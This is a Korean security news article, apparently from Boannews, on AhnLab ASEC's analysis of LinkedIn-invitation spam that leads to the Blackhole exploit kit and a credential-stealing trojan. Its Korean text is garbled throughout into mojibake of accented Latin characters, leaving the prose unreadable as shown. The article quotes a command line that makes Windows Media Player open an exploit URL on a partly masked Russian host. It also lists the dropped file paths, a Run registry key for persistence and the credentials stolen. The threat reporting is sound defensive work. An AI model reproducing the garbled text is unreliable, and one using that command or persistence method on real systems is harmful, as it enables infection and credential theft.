[º¸¾È´º½º ±Ç ÁØ] »ç¿ëÀÚ°¡ ¸¹Àº À¯¸í SNSÀÎ ¸µÅ©µåÀÎ(LinkedIn)ÀÇ ÃÊ´ë ¸ÞÀÏ°ú ºí·¢È¦ À¥ ÀͽºÇ÷ÎÀÕ ÅøŶÀÌ °áÇÕµÈ ½ºÆÔ ¸ÞÀÏÀÌ ´Ù½Ã ¹ß°ßµÅ ÁÖÀÇ°¡ ¿ä±¸µÈ´Ù°í ¾È·¦ ASEC ÃøÀº ¹àÇû´Ù.
ASEC¿¡¼´Â Áö³ 6¿ù 5ÀÏ À¥ ÀͽºÇ÷ÎÀÕ ÅøŶ(Web Exploit Toolkit)ÀÇ ÀÏÁ¾ÀÎ ºí·¢È¦(Blackhole) À¥ ÀͽºÇ÷ÎÀÕ ÅøŶÀÌ ½ºÆÔ ¸ÞÀÏ°ú °áÇյǾî À¯Æ÷µÇ¾ú´Ù´Â »ç½ÇÀ» ¹àÈù ¹Ù Àִµ¥, ÃÖ±Ù ´Ù½Ã ¹ß°ßµÈ °ÍÀÌ´Ù.
À̹ø¿¡ ¹ß°ßµÈ ¸µÅ©µåÀÎ ½ºÆÔ ¸ÞÀÏ°ú °áÇÕµÈ ÇüÅ·ΠÀ¯Æ÷µÈ ºí·¢È¦ À¥ ÀͽºÇ÷ÎÀÕ ÅøŶÀº ¾Æ·¡ À̹ÌÁö¿Í °°ÀÌ ´Ù¾çÇÑ Ãë¾àÁ¡µéÀ» ¾Ç¿ëÇÏ°í ÀÖÀ¸¸ç ÃÖÁ¾ÀûÀ¸·Î °¨¿°µÈ PC¿¡¼ »ç¿ëÀÚ Á¤º¸µéÀ» Å»ÃëÇϱâ À§ÇÑ ¾Ç¼ºÄÚµå °¨¿°À» ¸ñÀûÀ¸·Î ÇÏ°í ÀÖ´Ù°í ASEC ÃøÀº ¹àÇû´Ù.
¸µÅ©µåÀÎÀÇ ÃÊ´ë ¸ÞÀÏ·Î À§ÀåÇØ À¯Æ÷µÈ ½ºÆÔ ¸ÞÀÏÀº ¾Æ·¡ À̹ÌÁö¿Í °°Àº ÇüŸ¦ °¡Áö°í ÀÖÀ¸¸ç, [Accept] ºÎºÐÀº Á¤»óÀûÀÎ ¸µÅ©µåÀÎ À¥ ÆäÀÌÁö·Î ¿¬°áµÇ´Â °ÍÀÌ ¾Æ´Ï¶ó Áß±¹¿¡ À§Ä¡ÇÑ Æ¯Á¤ ½Ã½ºÅÛÀ¸·Î ¿¬°áµÇµµ·Ï ±¸¼ºµÇ¾î ÀÖ´Ù.
ÇØ´ç [Accept] ºÎºÐÀ» Ŭ¸¯ÇÏ°Ô µÇ¸é Áß±¹¿¡ À§Ä¡ÇÑ Æ¯Á¤ ½Ã½ºÅÛÀ¸·Î Á¢¼ÓÇϸç, PC »ç¿ëÀÚ¿¡°Ô´Â ¾Æ·¡¿Í °°Àº À̹ÌÁö¸¦ º¸¿©ÁÖ°Ô µÈ´Ù.
±×·¯³ª ½ÇÁ¦ ÇØ´ç À¥ ÆäÀÌÁö ÇÏ´Ü¿¡´Â ¾Æ·¡ À̹ÌÁö¿Í °°ÀÌ À¥ ÆäÀÌÁö ÇÏ´Ü¿¡´Â ´Ù¸¥ ·¯½Ã¾Æ¿¡ À§Ä¡ÇÑ ½Ã½ºÅÛÀ¸·Î ¿¬°áµÇ´Â ÀÚ¹Ù ½ºÅ©¸³Æ® Äڵ尡 ÀÎÄÚµù µÇ¾î ÀÖ´Ù.
ÇØ´ç ÀÚ¹Ù ½ºÅ©¸³Æ® Äڵ带 µðÄÚµùÇÏ°Ô µÇ¸é ¾Æ·¡ À̹ÌÁö¿Í °°ÀÌ iFrame À¸·Î ó¸®µÈ Äڵ尡 ³ªÅ¸³ª¸ç, »ç¿ëÀÚ ¸ð¸£°Ô ·¯½Ã¾Æ¿¡ À§Ä¡ÇÑ ºí·¢È¦ À¥ ÀͽºÇ÷ÎÀÕ ÅøŶÀÌ ¼³Ä¡µÇ¾î ÀÖ´Â ½Ã½ºÅÛÀ¸·Î ¿¬°áÇÏ°Ô µÈ´Ù.
ÇØ´ç ºí·¢È¦ À¥ ÀͽºÇ÷ÎÀÕ ÅøŶ¿¡ ¼º°øÀûÀ¸·Î ¿¬°áÇÏ°Ô µÇ¸é À¥ ºê¶ó¿ìÀú¿¡ ÀÇÇØ CMD ¸í·ÉÀ¸·Î À©µµ¿ì ¹Ìµð¾î Ç÷¹ÀÌ(Windows Media Player) Ãë¾àÁ¡À» ¾Ç¿ëÇϱâ À§ÇÑ ½Ãµµ¸¦ ÇÏ°Ô µÈ´Ù. ±×·¯³ª ºÐ¼® ´ç½Ã ÇØ´ç Ãë¾àÁ¡Àº Á¤»óÀûÀ¸·Î ¾Ç¿ëµÇÁö ¾Ê¾Ò´Ù.
"C:\Program Files\Windows Media Player\wmplayer.exe" /open http://************.ru:8080/forum/data/hcp_asx.php?f=182b5"
±×¸®°í µÎ ¹ø°·Î ÀÚ¹Ù(JAVA)¿Í ÀÎÅÍ³Ý ÀͽºÇ÷η¯(Internet Explorer)¿¡ Á¸ÀçÇÏ´Â ¾Ë·ÁÁø Ãë¾àÁ¡À» ¾Ç¿ëÇϱâ À§ÇÑ ½ºÅ©¸³Æ® ÆÄÀÏÀÌ ½ÇÇàµÈ´Ù.
¼¼ ¹ø°·Î ¾îµµºñ ¾ÆÅ©·Î¹î ¸®´õ(Adobe Acrobat Reader)¿¡ Á¸ÀçÇÏ´Â ¾Ë·ÁÁø Ãë¾àÁ¡À» ¾Ç¿ëÇϱâ À§ÇÑ PDF ÆÄÀÏÀ» ¾Æ·¡ À̹ÌÁö¿Í °°ÀÌ ´Ù¿î·Îµå ÈÄ ½ÇÇàÇÏ°Ô µÈ´Ù.
ÇØ´ç ¸µÅ©µåÀÎ ½ºÆÔ ¸ÞÀÏÀ» ¼ö½ÅÇÑ PC¿¡ À§¿¡¼ ¾ð±ÞÇÑ 4°³ÀÇ Ãë¾àÁ¡ Áß Çϳª¶óµµ Á¸ÀçÇÒ °æ¿ì¿¡´Â µ¿ÀÏÇÑ ½Ã½ºÅÛ¿¡¼ wpbt0.dll (127,648 ¹ÙÀÌÆ®)¸¦ ´Ù¿î·ÎµåÇÏ¿© ´ÙÀ½ °æ·Î¿¡ »ý¼ºÇÏ°Ô µÈ´Ù.
C:\Documents and Settings\Tester\Local Settings\Temp\wpbt0.dll
±×¸®°í »ý¼ºµÈ wpbt0.dll (127,648 ¹ÙÀÌÆ®)´Â ´Ù½Ã ÀÚ½ÅÀÇ º¹»çº»À» ¾Æ·¡ °æ·Î¿¡ KB01458289.exe(127,648 ¹ÙÀÌÆ®)¶ó´Â ¸íĪÀ¸·Î º¹»çÇÏ°Ô µÈ´Ù.
C:\Documents and Settings\Tester\Application Data\KB01458289.exe
°¨¿°µÈ PCÀÇ ·¹Áö½ºÆ®¸®¿¡ ´ÙÀ½ Å° °ªÀ» »ý¼ºÇÏ¿© PC°¡ ÀçºÎÆÃÇÒ ¶§¸¶´Ù ÀÚµ¿ ½ÇÇàµÇµµ·Ï ±¸¼ºµÆ´Ù.
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\
KB01458289.exe = C:\Documents and Settings\Tester\Application Data\KB01458289.exe
±×¸®°í °¨¿°µÈ PC¿¡¼ ½ÇÇà ÁßÀÎ ¸ðµç Á¤»ó ÇÁ·Î¼¼½ºÀÇ ½º·¹µå·Î ÀÚ½ÅÀÇ ÄÚµå ÀϺκÐÀ» »ðÀÔÇÑ ÈÄ ´ÙÀ½ÀÇ Á¤º¸µéÀ» ÈÄÅ·ÇÏ°Ô µÈ´Ù.
-À¥ »çÀÌÆ® Á¢¼Ó Á¤º¸
-FTP ½Ã½ºÅÛ Á¢¼Ó »ç¿ëÀÚ°èÁ¤°ú ºñ¹Ð¹øÈ£ Á¤º¸
-POP3 ÀÌ¿ë ÇÁ·Î±×·¥ »ç¿ëÀÚ°èÁ¤°ú ºñ¹Ð¹øÈ£ Á¤º¸
-À¥ Æû º¯Á¶(Formgrabber) ¹× À¥ Æû ÀÎÁ§¼Ç(httpinjects)À¸·Î À¥ »çÀÌÆ® »ç¿ëÀÚ °èÁ¤°ú ¾ÏÈ£ Á¤º¸
°¨¿°µÈ PC¿¡¼ ¼öÁýµÈ Á¤º¸µé ¸ðµÎ´Â ¾Æ·¡ À̹ÌÁö¿Í °°ÀÌ ¾Ç¼ºÄÚµå ³»ºÎ¿¡ ÇϵåÄÚµù µÇ¾î Àִ ƯÁ¤ ½Ã½ºÅÛµé·Î ÈÄÅ·ÇÑ µ¥ÀÌÅ͵é ÀüºÎ¸¦ ÀÎÄÚµùÇÏ¿© Àü¼ÛÇÏ°Ô µÈ´Ù.
±×¸®°í ¸¶Áö¸·À¸·Î °¨¿°µÈ PC »ç¿ëÀÚ¿¡°Ô´Â ¾Æ·¡ À¥ ÆäÀÌÁö¿Í °°ÀÌ ¿¬°áÀ» ½ÃµµÇÑ À¥ ÆäÀÌÁö¸¦ º¸¿©ÁÖ¾î Á¤»óÀûÀÎ Á¢¼ÓÀÌ ½ÇÆÐÇÑ °ÍÀ¸·Î À§ÀåÇÏ°Ô µÈ´Ù.
À̹ø¿¡ ¹ß°ßµÈ ¸µÅ©µåÀÎ ½ºÆÔ ¸ÞÀÏ°ú °áÇÕµÈ ºí·¢È¦ À¥ ÀͽºÇ÷ÎÀÕ ÅøŶ¿¡¼ À¯Æ÷ÇÑ ¾Ç¼ºÄÚµåµéÀº V3 Á¦Ç°±º¿¡¼ ¸ðµÎ ´ÙÀ½°ú °°ÀÌ Áø´ÜÇÑ´Ù°í ASEC ÃøÀº ¹àÇû´Ù.
-JS/Iframe
-Packed/Win32.Krap
-PDF/Exploit
-JS/Exploit
¸µÅ©µåÀÎ ½ºÆÔ ¸ÞÀÏ°ú °áÇÕµÈ ºí·¢È¦ À¥ ÀͽºÇ÷ÎÀÕ ÅøŶ¿¡¼ À¯Æ÷¸¦ ½ÃµµÇÑ ¾Ç¼ºÄÚµå´Â ±âÁ¸¿¡ ¹ß°ßµÈ ¿Â¶óÀÎ ¹ðÅ· Á¤º¸ Å»Ã븦 ¸ñÀûÀ¸·Î ÇÏ´Â Á¦¿ì½º(Zeus) ¶Ç´Â ½ºÆÄÀ̾ÆÀÌ(SpyEye)¿Í À¯»çÇÑ À¥ Æû º¯Á¶(Formgrabber) ¹× À¥ Æû ÀÎÁ§¼Ç (httpinjects) ±â´ÉÀ¸·Î À¥ »çÀÌÆ® »ç¿ëÀÚ°èÁ¤°ú ¾ÏÈ£Á¤º¸¸¦ Å»ÃëÇÒ ¼ö ÀÖ´Â °ÍÀ¸·Î ¾Ë·ÁÁ³´Ù.
ÀÌ´Â ¾Ç¼ºÄÚµå À¯Æ÷ÀÚ°¡ ÀǵµÇÏ´Â ´ëºÎºÐÀÇ À¥ »çÀÌÆ®µé¿¡¼ »ç¿ëÀÚ °èÁ¤°ú ºñ¹Ð¹øÈ£ Á¤º¸¸¦ Å»ÃëÇÒ ¼ö ÀÖÀ½À» ¶æÇÏ´Â °ÍÀ¸·Î, ´Ü¼ø ½ºÆÔ ¸ÞÀÏ·Î ÆǴܵǴõ¶óµµ ¼Û½ÅÀÚ°¡ ºÒ¸íÈ®ÇÑ ¸ÞÀÏ¿¡ Æ÷ÇÔµÈ À¥ »çÀÌÆ® ¿¬°á ¸µÅ©¸¦ Ŭ¸¯ÇÏÁö ¾Ê´Â ÁÖÀÇ°¡ ÇÊ¿äÇÏ´Ù.
[±Ç ÁØ ±âÀÚ(editor@boannews.com)]
<ÀúÀÛ±ÇÀÚ: º¸¾È´º½º(http://www.boannews.com/) ¹«´ÜÀüÀç-Àç¹èÆ÷±ÝÁö>